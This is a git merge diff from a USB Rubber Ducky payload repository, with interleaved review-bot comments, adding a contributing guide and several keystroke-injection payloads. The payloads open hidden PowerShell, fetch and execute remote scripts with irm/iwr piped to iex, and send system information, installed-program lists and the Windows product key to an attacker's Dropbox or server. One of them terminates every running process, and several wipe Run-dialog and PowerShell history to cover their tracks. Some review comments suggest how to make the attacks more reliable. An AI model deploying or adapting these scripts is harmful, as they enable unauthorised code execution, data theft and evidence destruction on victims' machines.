Merge branch 'hak5:master' into master
commit
7cfcac7c36
|
@ -0,0 +1,87 @@
|
|||
### Exported from README.md
|
||||
|
||||
<h1><a href='https://payloadhub.com'>Contributing</a></h1>
|
||||
|
||||
<p align="center">
|
||||
<a href="https://payloadhub.com"><img src="https://cdn.shopify.com/s/files/1/0068/2142/files/payloadhub.png?v=1652474600"></a>
|
||||
<br/>
|
||||
<a href="https://payloadhub.com">View Featured Payloads and Leaderboard </a>
|
||||
</p>
|
||||
|
||||
# Please adhere to the following best practices and style guides when submitting a payload.
|
||||
|
||||
Once you have developed your payload, you are encouraged to contribute to this repository by submitting a Pull Request. Reviewed and Approved pull requests will add your payload to this repository, where they may be publically available.
|
||||
|
||||
Please include all resources required for the payload to run. If needed, provide a README.md in the root of your payload's directory to explain things such as intended use, required configurations, or anything that will not easily fit in the comments of the payload.txt itself. Please make sure that your payload is tested, and free of errors. If your payload contains (or is based off of) the work of other's please make sure to cite their work giving proper credit.
|
||||
|
||||
|
||||
### Purely Destructive payloads will not be accepted. No, it's not "just a prank".
|
||||
Subject to change. Please ensure any submissions meet the [latest version](https://github.com/hak5/usbrubberducky-payloads/blob/master/README.md) of these standards before submitting a Pull Request.
|
||||
|
||||
|
||||
|
||||
## Naming Conventions
|
||||
Please give your payload a unique, descriptive and appropriate name. Do not use spaces in payload, directory or file names. Each payload should be submit into its own directory, with `-` or `_` used in place of spaces, to one of the categories such as exfiltration, phishing, remote_access or recon. Do not create your own category.
|
||||
|
||||
## Staged Payloads
|
||||
"Staged payloads" are payloads that **download** code from some resource external to the payload.txt.
|
||||
|
||||
While staging code used in payloads is often useful and appropriate, using this (or another) github repository as the means of deploying those stages is not. This repository is **not a CDN for deployment on target systems**.
|
||||
|
||||
Staged code should be copied to and hosted on an appropriate server for doing so **by the end user** - Github and this repository are simply resources for sharing code among developers and users.
|
||||
See: [GitHub acceptable use policies](https://docs.github.com/en/site-policy/acceptable-use-policies/github-acceptable-use-policies#5-site-access-and-safety)
|
||||
|
||||
Additionally, any source code that is intended to be staged **(by the end user on the appropriate infrastructure)** should be included in any payload submissions either in the comments of the payload itself or as a seperate file. **Links to staged code are unacceptable**; not only for the reasons listed above but also for version control and user safety reasons. Arbitrary code hidden behind some pre-defined external resource via URL in a payload could be replaced at any point in the future unbeknownst to the user -- potentially turning a harmless payload into something dangerous.
|
||||
|
||||
### Including URLs
|
||||
URLs used for retrieving staged code should refer exclusively to **example.com** using DEFINE in any payload submissions [see Payload Configuration section below](https://github.com/hak5/usbrubberducky-payloads/blob/master/README.md#payload-configuration).
|
||||
|
||||
### Staged Example
|
||||
|
||||
**Example scenario: your payload downloads a script and the executes it on a target machine.**
|
||||
- Include the script in the directory with your payload
|
||||
- Provide instructions for the user to move the script to the appropriate hosting service.
|
||||
- Provide a DEFINE with the placeholder example.com for the user to easily configure once they have hosted the script
|
||||
|
||||
[Simple Example of this style of payload](https://github.com/hak5/usbrubberducky-payloads/tree/master/payloads/library/exfiltration/Printer-Recon)
|
||||
|
||||
## Payload Configuration
|
||||
Be sure to take the following into careful consideration to ensure your payload is easily tested, used and maintained.
|
||||
In many cases, payloads will require some level of configuration **by the end payload user**.
|
||||
|
||||
- Abstract configuration(s) for ease of use. Use `DEFINE` where possible. Best practice is to use labels that start with # for easy identification throughout your payload.
|
||||
- Remember to use PLACEHOLDERS for configurable portions of your payload - do not share your personal URLs, API keys, Passphrases, etc...
|
||||
- URLs to staged payloads SHOULD NOT BE INCLUDED. URLs should be replaced by example.com. Provide instructions on how to specific resources should be hosted on the appropriate infrastructure.
|
||||
- Make note of both REQUIRED and OPTIONAL configuration(s) in your payload using comments at the top of your payload or "inline" where applicable
|
||||
<pre>
|
||||
Example:
|
||||
BEGINNING OF PAYLOAD
|
||||
... Payload Documentation...
|
||||
|
||||
REM CONFIGURATION
|
||||
REM REQUIRED - Provide URL used for Example
|
||||
DEFINE #MY_TARGET_URL example.com
|
||||
|
||||
REM OPTIONAL - How long until payload starts; default 5s
|
||||
DEFINE #BOOT_DELAY 5000
|
||||
|
||||
DELAY #BOOT_DELAY
|
||||
...
|
||||
STRING #MY_TARGET_URL
|
||||
...
|
||||
</pre>
|
||||
|
||||
## Payload Documentation
|
||||
Payloads should begin with `REM` comments specifying the title of the payload, the author, the target, and a brief description.
|
||||
<pre>
|
||||
Example:
|
||||
BEGINNING OF PAYLOAD
|
||||
|
||||
REM Title: Example Payload
|
||||
REM Author: Korben Dallas
|
||||
REM Description: Opens hidden powershell and
|
||||
REM Target: Windows 10
|
||||
REM Props: Hak5, Darren Kitchen, Korben
|
||||
REM Version: 1.0
|
||||
REM Category: General
|
||||
</pre>
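Review bot: the documentation template at the end of this hunk is itself incomplete; `REM Description: Opens hidden powershell and` stops mid-sentence, and since this block is what contributors will copy, it should be finished. In the Payload Configuration list, `Provide instructions on how to specific resources should be hosted on the appropriate infrastructure.` is ungrammatical (drop `how to`), and `publically`, `other's`, `seperate` and `should be submit into` should read `publicly`, `others'`, `separate` and `should be submitted into`.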
|
31
README.md
31
README.md
|
@ -31,18 +31,19 @@ This repository contains payloads, extensions and languages for the Hak5 USB Rub
|
|||
<a href="https://youtube.com/hak5"><img src="https://img.shields.io/youtube/channel/subscribers/UC3s0BtrBJpwNDaflRSoiieQ?style=for-the-badge"/></a>
|
||||
|
||||
<a href="https://twitter.com/hak5"><img src="https://img.shields.io/badge/follow-%40hak5-1DA1F2?logo=twitter&style=for-the-badge"/></a>
|
||||
|
||||
<a href="https://instagram.com/hak5gear"><img src="https://img.shields.io/badge/Instagram-E4405F?style=for-the-badge&logo=instagram&logoColor=white"/></a>
|
||||
<br/><br/>
|
||||
|
||||
</div>
|
||||
|
||||
# Table of contents
|
||||
<details>
|
||||
<details open>
|
||||
<ul>
|
||||
<li><a href="#shop">Links</a></li>
|
||||
<li><a href="#about-the-new-usb-rubber-ducky">About the USB Rubber Ducky</a></li>
|
||||
<li><a href="#build-your-payloads-with-payloadstudio">PayloadStudio (Editor + Compiler)</a></li>
|
||||
<li><a href="#about-duckyscript">About DuckyScript™</a></li>
|
||||
<li><a href="#contributing">Contributing Payloads</a></li>
|
||||
<li><b><a href="#contributing">Contributing Payloads</a></b></li>
|
||||
<li><a href="#legal"><b>Legal and Disclaimers</b></a></li>
|
||||
</ul>
|
||||
</details>
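Review bot: the table of contents ends up with two `Contributing Payloads` entries pointing at the same `#contributing` anchor, `<li><a href="#contributing">Contributing Payloads</a></li>` and the bold one right after it; if both survive the merge, keep one. The hunk also shows `<details>` immediately followed by `<details open>`; confirm the merged file keeps a single opening tag, because an extra unclosed `<details>` swallows the rest of the page into the collapsible block.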
|
||||
|
@ -86,9 +87,11 @@ A "flash drive" that types keystroke injection payloads into unsuspecting device
|
|||
<br/><br/>
|
||||
</div></b>
|
||||
|
||||
[![USB Rubber Ducky](https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MiIkRK_o3RBhZzUkrzr%2Fuploads%2FW1Cy0NoSZJhOkaG7gk9t%2Fusb-rubber-ducky-3d-white-bg.png?alt=media&token=7a92ff75-c7ae-4280-b4da-690bef71dac8 "USB Rubber Ducky")](https://hak5.org/products/usb-rubber-ducky)
|
||||
|
||||
<p align="center"><i> New USB Rubber Ducky (A+C, DuckyScript 3.0, 2022)</i></p>
|
||||
<p align="center">
|
||||
<a href="https://www.youtube.com/watch?v=meNlOrdQJFo"><img src="https://3076592524-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MiIkRK_o3RBhZzUkrzr%2Fuploads%2FCiHTAeL8jlCA3mG7ltCF%2FScreencast%20from%2003-03-2023%2001_08_58%20PM.gif?alt=media"/></a>
|
||||
<br/>
|
||||
<i>New USB Rubber Ducky (A+C, DuckyScript 3.0, 2022)</i>
|
||||
</p>
|
||||
|
||||
Computers trust humans. Humans use keyboards. Hence the universal spec — HID, or Human Interface Device.
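Review bot: the caption under the new screencast GIF, `<i>New USB Rubber Ducky (A+C, DuckyScript 3.0, 2022)</i>`, repeats the caption already placed under the product photo a few lines above; caption the GIF with what it shows or drop the second copy. While here, the context line `</div></b>` closes the tags in the wrong order (the `<b>` is closed after the `<div>` it sits inside), which is worth fixing in the same edit.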
|
||||
|
||||
|
@ -98,6 +101,8 @@ The USB Rubber Ducky — which looks like an innocent flash drive to humans —
|
|||
|
||||
Easily automate any task you can perform with a keyboard with an easy to learn language designed specifically for the USB Rubber Ducky.
|
||||
|
||||
|
||||
|
||||
# About DuckyScript™
|
||||
|
||||
## Legacy DuckyScript (1.0)
|
||||
|
@ -123,12 +128,24 @@ _Compiled DuckyScript means that there is both `source code` and an `inject.bin`
|
|||
|
||||
The files in this repository are _the source code_ in the form of `payload.txt` files.
|
||||
|
||||
<h1><a href="https://shop.hak5.org/collections/usb-rubber-ducky-accessories/products/advanced-duckyscript-course">Learn DuckyScript directly from the creators</a></h1>
|
||||
<p align="center">
|
||||
<a href="https://shop.hak5.org/collections/usb-rubber-ducky-accessories/products/advanced-duckyscript-course"><img width="500px" src="https://cdn.shopify.com/s/files/1/0068/2142/products/online-course-icon_2000x.png"/></a>
|
||||
|
||||
<p>
|
||||
Learn Advanced DuckyScript directly from the creators and unlock creative potential for the USB Rubber Ducky. Covering all aspects of advanced DuckyScript and Keystroke Injection attacks, these practical lessons build on one another from the basics on up.
|
||||
|
||||
This online course includes 7 hours of video instruction covering 54 lessons, 40+ exercises to reinforce your knowledge, quizzes throughout as well as 8 projects to test your skills.
|
||||
</p>
|
||||
</p>
|
||||
|
||||
|
||||
|
||||
<h1><a href="https://payloadstudio.hak5.org">Build your payloads with PayloadStudio</a></h1>
|
||||
<p align="center">
|
||||
Take your DuckyScript™ payloads to the next level with this full-featured,<b> web-based (entirely client side) </b> development environment.
|
||||
<br/>
|
||||
<a href="https://payloadstudio.hak5.org"><img src="https://cdn.shopify.com/s/files/1/0068/2142/products/payload-studio-icon_180x.png?v=1659135374"></a>
|
||||
<a href="https://payloadstudio.hak5.org"><img width="500px" src="https://cdn.shopify.com/s/files/1/0068/2142/products/payload-studio-icon_2000x.png"></a>
|
||||
<br/>
|
||||
<i>Payload studio features all of the conveniences of a modern IDE, right from your browser. From syntax highlighting and auto-completion to live error-checking and repo synchronization - building payloads for Hak5 hotplug tools has never been easier!
|
||||
<br/><br/>
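Review bot: the course blurb nests a `<p>` inside `<p align="center">`, which is invalid HTML; browsers close the outer paragraph as soon as the inner `<p>` starts, so the centring is lost and the second `</p>` becomes a stray close tag. Wrap the section in `<div align="center">` instead. In the PayloadStudio block the `<i>` opened at `<i>Payload studio features all of the conveniences of a modern IDE...` is never closed in this hunk, and the two icon links (`payload-studio-icon_180x.png` and `payload-studio-icon_2000x.png`) render two logos back to back; one is enough.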
|
||||
|
|
|
@ -0,0 +1,28 @@
|
|||
# Close All Applications - BADUSB ✅
|
||||
|
||||
A script used to close all target open applications.
|
||||
|
||||
🟢 **Plug-And-Play** 🟢
|
||||
|
||||
**Category**: Execution
|
||||
|
||||
## Description
|
||||
|
||||
A script used to close all target open applications.
|
||||
|
||||
Opens PowerShell hidden, download a Python script, execute it, remove Python script downloaded, delete powershell history.
|
||||
|
||||
## Getting Started
|
||||
|
||||
### Dependencies
|
||||
|
||||
* Internet Connection
|
||||
* Windows 10,11
|
||||
|
||||
### Executing program
|
||||
|
||||
* Plug in your device
|
||||
|
||||
### Settings
|
||||
|
||||
- No settings - Plug-And-Play
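Review bot: the Dependencies list omits that the target must have Python on PATH; the companion `.ps1` runs `& python $savePath`, so without an interpreter the payload downloads the script and does nothing, and `pip install psutil` additionally needs pip and network access. `- No settings - Plug-And-Play` also contradicts the configuration the user must edit before use: `DEFINE POWERSHEL_CODE example.com` in payload.txt and `$scriptUrl` in the `.ps1`. List both as REQUIRED, as the contributing guide asks, and state that two files (the `.ps1` and `script.py`) have to be hosted. The Description section repeats the summary sentence verbatim, and `download a Python script, execute it, remove Python script downloaded, delete powershell history` should be reworded as a sentence.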
|
|
@ -0,0 +1,18 @@
|
|||
# Download Python script
|
||||
|
||||
# Reply $scriptUrl with YOUR LINK. The Payload should be script.py
|
||||
$scriptUrl = "YOUR_END_USER_LINK_WITH_PAYLOAD"
|
||||
$savePath = "$env:temp\script.py"
|
||||
(New-Object System.Net.WebClient).DownloadFile($scriptUrl, $savePath)
|
||||
|
||||
# Execute Python script
|
||||
& python $savePath
|
||||
|
||||
# Delete the downloaded script
|
||||
Remove-Item $savePath
|
||||
|
||||
# Clear the download history from the system's web cache
|
||||
Remove-Item -Path "$env:LOCALAPPDATA\Microsoft\Windows\WebCache\*" -Recurse -Force
|
||||
|
||||
# Clear the PowerShell command history
|
||||
Clear-History
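Review bot: the two cleanup lines do not do what their comments claim. `Remove-Item -Path "$env:LOCALAPPDATA\Microsoft\Windows\WebCache\*" -Recurse -Force` targets the WinINet/Edge cache database, which `System.Net.WebClient` does not write to, and those files are held open by the system, so the line mostly produces errors; `Clear-History` clears only the current session's in-memory history, so the README's "delete powershell history" wording overstates it. Also `$scriptUrl = "YOUR_END_USER_LINK_WITH_PAYLOAD"` should be the `example.com` placeholder required by the contributing guide, `# Reply $scriptUrl with YOUR LINK` should say `Replace`, and there is no handling for `python` being absent: `& python` throws and the script proceeds straight to `Remove-Item`.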
|
|
@ -0,0 +1,44 @@
|
|||
REM #####################################################
|
||||
REM # |
|
||||
REM # Title : Close All Applications |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Execution |
|
||||
REM # Target : Windows 10-11 |
|
||||
REM # |
|
||||
REM #####################################################
|
||||
|
||||
REM Plug-And-Play
|
||||
|
||||
REM
|
||||
REM 1. Open a powershell
|
||||
REM 2. Download a Python script
|
||||
REM 3. Execute it
|
||||
REM 4. Remove Python script downloaded
|
||||
REM 5. Delete powershell history
|
||||
REM
|
||||
|
||||
REM Reply with YOUR LINK. The Payload should be close_all_app.ps1
|
||||
DEFINE POWERSHEL_CODE example.com
|
||||
|
||||
DELAY 2000
|
||||
GUI x
|
||||
DELAY 250
|
||||
DOWNARROW
|
||||
DOWNARROW
|
||||
DOWNARROW
|
||||
DOWNARROW
|
||||
DOWNARROW
|
||||
DOWNARROW
|
||||
DOWNARROW
|
||||
DOWNARROW
|
||||
DOWNARROW
|
||||
DOWNARROW
|
||||
ENTER
|
||||
DELAY 1000
|
||||
TAB
|
||||
TAB
|
||||
ENTER
|
||||
DELAY 2000
|
||||
STRING irm POWERSHEL_CODE | iex
|
||||
ENTER
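Review bot: `DEFINE POWERSHEL_CODE example.com` is misspelled (`POWERSHELL`) and, per the contributing guide in this same PR, the label should start with `#`; `REM Reply with YOUR LINK. The Payload should be close_all_app.ps1` should read `Replace`. The menu navigation (`GUI x`, ten `DOWNARROW`, `ENTER`, then `TAB`, `TAB`, `ENTER`) depends on a fixed item count in the Win+X menu, which differs between Windows 10 and Windows 11 (Windows 11 lists Terminal rather than Windows PowerShell), yet the header targets `Windows 10-11`; document which build it was tested on. The header also lacks the `REM Description:` line the contributing guide requires.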
|
|
@ -0,0 +1,12 @@
|
|||
try:
|
||||
import psutil
|
||||
except:
|
||||
import os
|
||||
os.system("pip install psutil")
|
||||
import psutil
|
||||
|
||||
for process in psutil.process_iter():
|
||||
try:
|
||||
process.terminate()
|
||||
except:
|
||||
pass
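Review bot: the bare `except:` clauses swallow everything, including `SystemExit` and `KeyboardInterrupt`; use `except ImportError:` for the import and `except (psutil.NoSuchProcess, psutil.AccessDenied):` in the loop. Logic: iterating `psutil.process_iter()` and calling `terminate()` on every entry also hits the interpreter running this script and the PowerShell that launched it, so the `.ps1`'s later `Remove-Item` and `Clear-History` lines may never execute. `os.system("pip install psutil")` installs an unpinned package from PyPI at run time, a supply-chain dependency the README should at least declare.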
|
|
@ -0,0 +1,6 @@
|
|||
#Replace <APP_KEY> with the actual "App Key" of your app.
|
||||
#Replace <APP_SECRET> with the actual "App Secret" of your app.
|
||||
#Replace <REFRESH_TOKEN> with the actual "Refresh Token" of your app.
|
||||
|
||||
|
||||
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force; Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method POST -Headers @{"Authorization" = "Bearer $((Invoke-RestMethod -Uri "https://api.dropboxapi.com/oauth2/token" -Method POST -Headers @{"Content-Type" = "application/x-www-form-urlencoded"} -Body @{grant_type = "refresh_token"; refresh_token = "<REFRESH_TOKEN>"; client_id = "<APP_KEY>"; client_secret = "<APP_SECRET>"}).access_token)"; "Content-Type" = "application/octet-stream"; "Dropbox-API-Arg" = '{ "path": "/reports/' + $env:computername + '.txt", "mode": "add", "autorename": true, "mute": false }'} -Body "~~~~~ System Information ~~~~~`n $(SYSTEMINFO | Out-String) `n~~~~~ Installed Programs ~~~~~`n $(Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher | Out-String)" | Out-Null
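Review bot: `refresh_token = "<REFRESH_TOKEN>"; client_id = "<APP_KEY>"; client_secret = "<APP_SECRET>"` embed a long-lived Dropbox credential for an app the README configures with "Full Dropbox" access, in a script the README tells users to publish at a Dropbox share link and that is left in the target's command line; anyone holding the link or the target's process history holds the credential. The README should say so, and an "App folder" scoped app would limit the blast radius. This one-liner also duplicates the multi-line script added in the same PR; keep one and reference it.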
|
|
@ -0,0 +1,53 @@
|
|||
<h1 align="center">
|
||||
<a href="https://git.io/typing-svg">
|
||||
<img src="https://readme-typing-svg.herokuapp.com/?lines=Windows+Privilege+Excalibur+🪟🗡️">
|
||||
</a>
|
||||
</h1>
|
||||
|
||||
## Description
|
||||
|
||||
This payload exfiltrates Windows system information and installed programs from the target computer to Dropbox cloud storage for subsequent privilege escalation analysis. *Only works on Windows 10,11.*
|
||||
|
||||
## Usage
|
||||
|
||||
### Setup
|
||||
|
||||
- **Configure your Dropbox application**
|
||||
|
||||
- Create a Dropbox account.
|
||||
- [Create a Dropbox "App"](https://www.dropbox.com/developers/apps/create) with a "Scoped access" API and a "Full Dropbox" access.
|
||||
- Go to the settings of this app and write down your "App key" and "App secret".
|
||||
*These are your "<APP_KEY>" and "<APP_SECRET>".*
|
||||
- Next, go to the "Permissions" tab and enable the "files.metadata.write" and "files.content.write" permissions.
|
||||
- After that, open this link in your browser *(values between brackets must be changed)*.
|
||||
```
|
||||
https://www.dropbox.com/oauth2/authorize?client_id=<APP_KEY>&token_access_type=offline&response_type=code
|
||||
```
|
||||
- Connect your application, allow its permissions, and note the code it gives you.
|
||||
*This is your "<APP_CODE>".*
|
||||
- Open a command prompt and run this command *(values between brackets must be changed)*.
|
||||
```
|
||||
curl https://api.dropbox.com/oauth2/token -d code=<APP_CODE> -d grant_type=authorization_code -u <APP_KEY>:<APP_SECRET>
|
||||
```
|
||||
- Note the "refresh_token" value of the result.
|
||||
*This is your "<REFRESH_TOKEN>".*
|
||||
|
||||
- **Prepare your payload**
|
||||
|
||||
- Download the Powershell script ".ps1".
|
||||
- Modify it to include the <APP_KEY>, <APP_SECRET>, and <REFRESH_TOKEN> of your application.
|
||||
- Upload your modified ".ps1" file to Dropbox and copy the upload link.
|
||||
- Replace the end of the link from "?dl=0" to "?dl=1"
|
||||
*This is your "<DOWNLOAD_LINK>".*
|
||||
- Download the "payload.txt" file.
|
||||
- Edit it to include your <DOWNLOAD_LINK>.
|
||||
|
||||
### Analysis
|
||||
|
||||
Once you have your report file, you can easily extract the information from the system and scan it for vulnerabilities. You can use a tool such as [WES-NG](https://github.com/bitsadmin/wesng) to check for missing patches that may result in a vulnerability that you could use to elevate your privileges on the target system.
|
||||
|
||||
The software installed on the target system may also present various opportunities for elevation of privileges. That's why the report also contains the name and version of each software installed on the target computer, allowing you to search for existing exploits on each installed software, through sites like [Exploit Database](https://www.exploit-db.com) or [Packet Storm](https://packetstormsecurity.com).
|
||||
|
||||
---
|
||||
|
||||
*This script is for educational purposes only. This script is authorized auditing and security analysis purposes only where permitted subject to local and international laws where applicable. Users are solely responsible for compliance with all laws of their locality. This author claims no responsibility for unauthorized or unlawful use.*
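Review bot: the bare `<APP_KEY>`, `<APP_SECRET>`, `<REFRESH_TOKEN>`, `<APP_CODE>` and `<DOWNLOAD_LINK>` tokens in the markdown prose are parsed as HTML tags and dropped by GitHub's renderer, so lines such as `*These are your "<APP_KEY>" and "<APP_SECRET>".*` render as `These are your "" and ""`; wrap them in backticks. The setup asks for `"Full Dropbox" access` although only `files.metadata.write` and `files.content.write` are needed to write under `/reports/`; an "App folder" app is sufficient and limits what a leaked refresh token can reach, which matters because the modified `.ps1` containing the secrets is then published at a share link. In the closing note, `This script is authorized auditing and security analysis purposes only` is missing `for`.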
|
|
@ -0,0 +1,17 @@
|
|||
REM Title: Windows Privilege Excalibur
|
||||
REM Author: Who-Is-Julien
|
||||
REM Description: This payload exfiltrates Windows system information and installed programs from the target computer to DropBox cloud storage for subsequent privilege escalation analysis.
|
||||
REM Target: Windows 10, 11
|
||||
|
||||
REM Replace DOWNLOAD_LINK with the actual download link of the script.
|
||||
DEFINE DOWNLOAD_LINK example.com
|
||||
|
||||
|
||||
DELAY 2000
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr
|
||||
STRING DOWNLOAD_LINK
|
||||
STRING ; invoke-expression $pl
|
||||
DELAY 500
|
||||
ENTER
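Review bot: the three `STRING` lines are typed back to back, so unless the trailing space after `iwr` in `STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr` survives in the file, the target receives `iwrDOWNLOAD_LINK`, which is not a command; keep the URL on the same `STRING` line or make the separator explicit. As in the other payloads in this PR, `DEFINE DOWNLOAD_LINK example.com` should use the `#`-prefixed label the contributing guide asks for, and the header lacks `REM Version:` and `REM Category:`.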
|
|
@ -0,0 +1,43 @@
|
|||
#Replace <APP_KEY> with the actual "App Key" of your app.
|
||||
#Replace <APP_SECRET> with the actual "App Secret" of your app.
|
||||
#Replace <REFRESH_TOKEN> with the actual "Refresh Token" of your app.
|
||||
|
||||
|
||||
#Clear windows run dialog history
|
||||
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force
|
||||
|
||||
#Define the headers required for the access token request
|
||||
|
||||
$headers = @{
|
||||
"Content-Type" = "application/x-www-form-urlencoded"
|
||||
}
|
||||
|
||||
#Define the parameters for the access token request
|
||||
|
||||
$body = @{
|
||||
grant_type = "refresh_token"
|
||||
refresh_token = "<REFRESH_TOKEN>"
|
||||
client_id = "<APP_KEY>"
|
||||
client_secret = "<APP_SECRET>"
|
||||
}
|
||||
|
||||
#Request an access token from Dropbox using the body and headers defined above
|
||||
|
||||
$access_token_response = Invoke-RestMethod -Uri "https://api.dropboxapi.com/oauth2/token" -Method POST -Headers $headers -Body $body
|
||||
$access_token = $access_token_response.access_token
|
||||
|
||||
#Define headers for the file upload
|
||||
|
||||
$headers = @{
|
||||
"Authorization" = "Bearer $access_token"
|
||||
"Content-Type" = "application/octet-stream"
|
||||
"Dropbox-API-Arg" = '{ "path": "/reports/' + $env:computername + '.txt", "mode": "add", "autorename": true, "mute": false }'
|
||||
}
|
||||
|
||||
#Define the report for the file upload
|
||||
|
||||
$body = "~~~~~ System Information ~~~~~`n $(SYSTEMINFO | Out-String) `n~~~~~ Installed Programs ~~~~~`n $(Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher | Out-String)"
|
||||
|
||||
#Upload the report to Dropbox using the headers and body defined above
|
||||
|
||||
Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method POST -Headers $headers -Body $body | Out-Null
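Review bot: neither `Invoke-RestMethod` call has error handling, so a failed token request leaves `$access_token` empty and the upload is attempted with `Bearer ` and fails with a visible error; wrap them in `try`/`catch` or use `-ErrorAction Stop`. The `Dropbox-API-Arg` JSON is assembled by string concatenation with `$env:computername` unescaped; building the object and passing it through `ConvertTo-Json -Compress` is safer. The same credential exposure applies as for the one-liner: `refresh_token = "<REFRESH_TOKEN>"` together with `client_secret = "<APP_SECRET>"` is a long-lived full-scope credential in a script the README publishes at a share link, and the two files are duplicates of each other.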
|
|
@ -1,4 +1,4 @@
|
|||
#Replace REMOTE_IP_ADDRESS with the actual IP address of the remote server hosting the script.
|
||||
#Replace <REMOTE_IP_ADDRESS> with the actual IP address of the remote server hosting the script.
|
||||
|
||||
|
||||
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force; Invoke-WebRequest -Uri "http://REMOTE_IP_ADDRESS?duckey=$((Get-WmiObject -Class SoftwareLicensingService).OA3xOriginalProductKey)" -Method Get -UseBasicParsing | Out-Null; Exit
|
||||
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force; Invoke-WebRequest -Uri "http://<REMOTE_IP_ADDRESS>?duckey=$((Get-WmiObject -Class SoftwareLicensingService).OA3xOriginalProductKey)" -Method Get -UseBasicParsing | Out-Null
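Review bot: the placeholder now reads `<REMOTE_IP_ADDRESS>`, but the contributing guide added in this same PR requires `example.com` set through a `DEFINE`; in addition, angle brackets are not valid URI characters, so a user who forgets to edit `-Uri "http://<REMOTE_IP_ADDRESS>?duckey=..."` gets a parse error rather than an obvious placeholder. The product key travels in a cleartext GET query string, which is why it shows up in the server's access log (and in any proxy log on the path); the README should say so and recommend HTTPS. Dropping `; Exit` is fine, since the hidden PowerShell started with a command string ends when the expression returns.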
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
<h1 align="center">
|
||||
<a href="https://git.io/typing-svg">
|
||||
<img src="https://readme-typing-svg.herokuapp.com/?lines=Windows+Product+Duckey+🦆🔑¢er=true&size=25">
|
||||
<img src="https://readme-typing-svg.herokuapp.com/?lines=Windows+Product+Duckey+🦆🔑">
|
||||
</a>
|
||||
</h1>
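Review bot: the parameters being removed (`¢er=true&size=25` in the old line) were lost because the markdown renderer reads `&cen` as the `¢` entity, which is also why the old line appears with `¢` in this diff. Encoding the ampersands as `&amp;center=true&amp;size=25` keeps the centred, larger banner instead of giving it up.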
|
||||
|
||||
|
@ -8,34 +8,27 @@
|
|||
|
||||
This payload exfiltrate the target's Windows product key to a remote server. *Only works on Windows 10,11.*
|
||||
|
||||
## Demo
|
||||
|
||||
<h2 align="center">
|
||||
<img src="https://raw.githubusercontent.com/Who-Is-Julien/Ducky-Scripts/main/Windows-Product-Duckey/demo.gif">
|
||||
</h2>
|
||||
|
||||
Here we can see that the attacker's server received the following request:
|
||||
```
|
||||
GET /?duckey=A1B2C-3D4E5-F6G6F-5E4D3-C2B1A HTTP/1.1
|
||||
```
|
||||
*Which contains the target's Windows product key!*
|
||||
|
||||
## Usage
|
||||
|
||||
To use this script, follow these steps:
|
||||
### Setup
|
||||
|
||||
1. Set up a website on your server or a computer in the same network as the target's computer. You can use Python to do this by running the following command:
|
||||
- Set up a website on your server or a computer in the same network as the target's computer. You can use Python to do this by running the following command:
|
||||
```
|
||||
python -m http.server 80
|
||||
```
|
||||
2. Download the payload.txt and .ps1 files and modify them to include the IP address of your server.
|
||||
3. Move the modified .ps1 file to the root directory of your website, so it is downloadable from this address:
|
||||
- Download the "payload.txt" and ".ps1" files and modify them to include the IP address of your server.
|
||||
- Move the modified ".ps1" file to the root directory of your website, so it is downloadable from this address:
|
||||
```
|
||||
http://REMOTE_IP_ADDRESS/.ps1
|
||||
http://<REMOTE_IP_ADDRESS>/.ps1
|
||||
```
|
||||
4. Plug in your device that is configured with the modified payload.txt to the target's computer.
|
||||
5. Wait for the target to download and execute the .ps1 file from your website. You can track the target's IP address and Windows product key by checking your website logs.
|
||||
|
||||
### Analysis
|
||||
|
||||
Once the payload is executed, you can find the target's IP address and Windows product key by checking your website logs.
|
||||
|
||||
|
||||
***Note**: This script is designed to send the results to a specific server, so you don't have to rely on any file sharing services. Additionally, you can easily adapt it to work with encrypted sites.*
|
||||
|
||||
---
|
||||
|
||||
*This script is for educational purposes only. This script is authorized auditing and security analysis purposes only where permitted subject to local and international laws where applicable. Users are solely responsible for compliance with all laws of their locality. This author claims no responsibility for unauthorized or unlawful use.*
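Review bot: the rewrite drops the old steps 4 and 5 (`Plug in your device that is configured with the modified payload.txt...` and `Wait for the target to download and execute the .ps1 file...`), so Setup now ends before the device is ever plugged in; keep a final step or add a Run heading. `http://<REMOTE_IP_ADDRESS>/.ps1` names a bare extension rather than a file, so "move the modified .ps1 file to the root directory" cannot be followed literally; give the script its actual filename. The note that the script "can easily adapt to work with encrypted sites" should say HTTPS plainly and mention that the key is otherwise sent in a cleartext query string (`GET /?duckey=...`) that is written to server and proxy logs. In context: `This payload exfiltrate` should be `exfiltrates`, and the disclaimer is missing `for` in `authorized for auditing`.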
|
||||
|
|
|
@ -1,14 +0,0 @@
|
|||
REM Title: Windows Product Duckey
|
||||
REM Author: Who-Is-Julien
|
||||
REM Description: This payload exfiltrate the target's Windows product key to a remote server.
|
||||
REM Target: Windows 10, 11
|
||||
|
||||
REM Replace REMOTE_IP_ADDRESS with the actual IP address of the remote server hosting the script.
|
||||
|
||||
|
||||
DELAY 2000
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr http://REMOTE_IP_ADDRESS/.ps1; invoke-expression $pl
|
||||
DELAY 500
|
||||
ENTER
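Review bot: this hunk deletes the Windows-Product-Duckey `payload.txt` outright, while the README updated in the same PR still says to "Download the "payload.txt" and ".ps1" files"; if the file was rewritten to use `DEFINE` under a new name, the rename is not shown here. Confirm a `payload.txt` still exists in that directory.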
|
|
